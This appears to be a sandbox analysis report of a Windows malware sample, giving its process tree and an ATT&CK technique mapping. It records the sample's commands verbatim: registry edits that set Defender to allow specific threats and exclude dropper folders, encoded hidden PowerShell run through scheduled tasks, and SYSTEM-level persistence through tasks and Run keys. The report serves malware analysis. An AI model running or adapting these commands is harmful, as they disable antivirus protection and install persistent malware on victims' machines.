    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:384
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3312
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DlbZONUGhjVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GpfcWYRxKqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KrPQunXfXpAVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oVhJPNkDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nBRnpywzcTvqknVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:596
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4288
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:3020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DlbZONUGhjVU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4968
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GpfcWYRxKqUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4076
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KrPQunXfXpAVC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oVhJPNkDU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nBRnpywzcTvqknVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3504
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wUBDPVxDQVpvNZiy /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2532
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gJMBcvCaW" /SC once /ST 18:27:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3308
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gJMBcvCaW"
  2⤵
  PID:4056
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gJMBcvCaW"
  2⤵
  PID:4320
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "GyWbuVQzPmDmgkCMH" /SC once /ST 17:59:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe\" KS /vMsite_iduTf 385118 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:2612
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:4616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4860
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:2848
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2296

C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe
C:\Windows\Temp\wUBDPVxDQVpvNZiy\RLuQQTfvaNwaabW\wXyVQwS.exe KS /vMsite_iduTf 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:2372
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bwpFiyeZPJPVdaMxTt"
  2⤵
  PID:3192
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:4240
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:4980
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:1212
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:4020
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oVhJPNkDU\kunRDm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ztlTbPYifermRZH" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ztlTbPYifermRZH2" /F /xml "C:\Program Files (x86)\oVhJPNkDU\exZibaI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3892
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ztlTbPYifermRZH"
  2⤵
  PID:3720
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ztlTbPYifermRZH"
  2⤵
  PID:4436
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "lYRFoiYPtWPCfC" /F /xml "C:\Program Files (x86)\DlbZONUGhjVU2\NnXXDql.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3492
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4288
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "TrprvximDXTQo2" /F /xml "C:\ProgramData\nBRnpywzcTvqknVB\ufiowBU.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "NtSpqNxSmBAhIMqiB2" /F /xml "C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\XdocruQ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3504
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gFXJCgZLnIrdqQxYYQs2" /F /xml "C:\Program Files (x86)\KrPQunXfXpAVC\jNcfuKN.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "HKFMMLmWpeGdwIqGl" /SC once /ST 06:12:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll\",#1 /Vssite_idnBE 385118" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:1836
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "HKFMMLmWpeGdwIqGl"
  2⤵
  PID:412
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:2792
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:3704
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  - Windows security bypass
  - Executes dropped EXE
  - Windows security modification
  - Adds Run key to start application
  - Checks for VirtualBox DLLs, possible anti-VM trick
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4328
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:4640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "GyWbuVQzPmDmgkCMH"
  2⤵
  PID:4544

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll",#1 /Vssite_idnBE 385118
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1028
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\wUBDPVxDQVpvNZiy\OIkNSqKA\fLkiqZd.dll",#1 /Vssite_idnBE 385118
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "HKFMMLmWpeGdwIqGl"
    3⤵
    PID:4000

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:520

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:3572

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery